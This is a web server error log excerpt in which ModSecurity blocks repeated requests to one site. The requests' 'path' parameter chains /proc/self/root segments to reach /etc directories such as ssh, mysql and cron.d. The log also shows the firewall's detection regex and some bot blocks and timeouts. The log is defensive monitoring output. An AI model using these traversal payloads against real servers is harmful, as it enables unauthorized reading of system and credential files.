"abuOzeyqAr6etmhZHNoi-QAAAFA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 02:51:12.071387 2026] [:error] [pid 19093:tid 140411725141760] [client 74.7.241.31:47150] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/avahi"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuO0F_V7PWP6ixUYl56ZAAAAoI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 02:51:16.587052 2026] [:error] [pid 27403:tid 140411649607424] [client 74.7.241.31:47162] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/xdg"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuO1BkFeYa1D6dYQnCq_wAAAcs"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 02:51:18.709828 2026] [:error] [pid 31803:tid 140411691570944] [client 74.7.241.31:48242] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/gss"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuO1uyqAr6etmhZHNoi_wAAAEY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 02:51:21.024439 2026] [:error] [pid 15826:tid 140411725141760] [client 74.7.241.31:48244] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/ntp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuO2eoXxyEfFpUF8f_QiQAAAUI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 02:51:22.043570 2026] [:error] [pid 14269:tid 140411582465792] [client 74.7.244.43:41412] [client 74.7.244.43] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abuO2gbLMZ6AikZjR9UbtAAAABM"]
[Thu Mar 19 02:51:22.469698 2026] [core:alert] [pid 14269:tid 140411725141760] [client 57.141.18.23:57714] /home/storage/0/fc/16/bandeirantesbomb3/public_html/.htaccess: </FilesMatch> without matching <FilesMatch> section
[Thu Mar 19 02:51:23.346997 2026] [:error] [pid 15826:tid 140411683178240] [client 74.7.241.31:48254] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/rc.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuO2-oXxyEfFpUF8f_QjQAAAUc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 02:51:25.846761 2026] [:error] [pid 31803:tid 140411741927168] [client 74.7.241.31:48256] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/udev"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuO3eyqAr6etmhZHNojAAAAAEA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 02:51:29.799834 2026] [:error] [pid 17653:tid 140411548894976] [client 74.7.241.31:54226] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/ssh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuO4cdf6f5d65gmYZQxSQAAAtc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 02:51:30.113829 2026] [proxy_fcgi:error] [pid 19093:tid 140411708356352] (70007)The timeout specified has expired: [client 179.188.53.243:56380] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 02:51:34.386570 2026] [:error] [pid 31803:tid 140411716749056] [client 74.7.241.31:54228] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/rpm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuO5OyqAr6etmhZHNojAQAAAEM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 02:51:37.115797 2026] [:error] [pid 31803:tid 140411607643904] [client 74.7.241.31:54228] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/mysql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuO6eyqAr6etmhZHNojBQAAAFA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 02:51:42.979172 2026] [:error] [pid 17887:tid 140411658000128] [client 74.7.241.31:42680] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/ipmi"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuO7gkwaGbbGflqUZBwzwAAAMo"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 02:51:48.137290 2026] [:error] [pid 27293:tid 140411641214720] [client 74.7.241.31:42688] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/lwcorp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuO9P-YZRR_7pZ7nDJMhgAAA8w"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 02:51:53.361101 2026] [:error] [pid 15826:tid 140411590858496] [client 74.7.241.31:49052] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/tuned"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuO-eoXxyEfFpUF8f_QogAAAVI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 02:51:53.818090 2026] [mime_magic:error] [pid 17887:tid 140411607643904] (70014)End of file found: [client 57.141.18.60:58456] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Thu Mar 19 02:51:55.643808 2026] [:error] [pid 14269:tid 140411691570944] [client 74.7.241.31:49062] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/cron.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuO-wbLMZ6AikZjR9UbuwAAAAY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 02:51:56.109789 2026] [proxy_fcgi:error] [pid 31803:tid 140411699963648] (70007)The timeout specified has expired: [client 179.188.53.243:56894] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 02:52:06.458042 2026] [:error] [pid 15826:tid 140411725141760] [client 74.7.243.128:59012] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/dnsmasq.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuPBuoXxyEfFpUF8f_QsAAAAUI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 02:52:25.129861 2026] [proxy_fcgi:error] [pid 31803:tid 140411624429312] (70007)The timeout specified has expired: [client 179.188.53.243:57464] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 02:52:58.126713 2026] [proxy_fcgi:error] [pid 14269:tid 140411624429312] (70007)The timeout specified has expired: [client 179.188.53.243:58116] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 02:53:30.137803 2026] [proxy_fcgi:error] [pid 17887:tid 140411582465792] (70007)The timeout specified has expired: [client 179.188.53.243:58752] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 02:53:44.723385 2026] [:error] [pid 17887:tid 140411624429312] [client 74.7.228.61:42160] [client 74.7.228.61] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abuPaAkwaGbbGflqUZBxEwAAAM4"]
[Thu Mar 19 02:53:58.064472 2026] [proxy_fcgi:error] [pid 17653:tid 140411607643904] (70007)The timeout specified has expired: [client 179.188.53.243:59382] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 02:54:03.011719 2026] [:error] [pid 26799:tid 140411666392832] [client 74.7.243.128:47370] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/cron.daily"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuPe9a6ubjKNq_cu4b6uQAAA0k"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 02:54:11.960809 2026] [mime_magic:error] [pid 27293:tid 140411641214720] (70014)End of file found: [client 57.141.18.101:60908] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Thu Mar 19 02:54:18.036495 2026] [:error] [pid 27293:tid 140411725141760] [client 74.7.241.31:56500] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/raddb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuPiv-YZRR_7pZ7nDJM6gAAA8I"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 02:54:25.145861 2026] [proxy_fcgi:error] [pid 26799:tid 140411590858496] (70007)The timeout specified has expired: [client 179.188.53.243:60006] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 02:54:34.407208 2026] [mime_magic:error] [pid 14269:tid 140411725141760] (70014)End of file found: [client 74.7.243.128:39206] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php, referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/cwd/images
[Thu Mar 19 02:54:47.264647 2026] [:error] [pid 15826:tid 140411725141760] [client 74.7.241.31:38608] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/libnl"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuPp-oXxyEfFpUF8f_RBAAAAUI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 02:54:53.033913 2026] [proxy_fcgi:error] [pid 26799:tid 140411683178240] (70007)The timeout specified has expired: [client 179.188.53.243:60580] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 02:54:58.342077 2026] [:error] [pid 15826:tid 140411557287680] [client 74.7.241.31:50070] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/groff"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuPsuoXxyEfFpUF8f_RCgAAAVY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
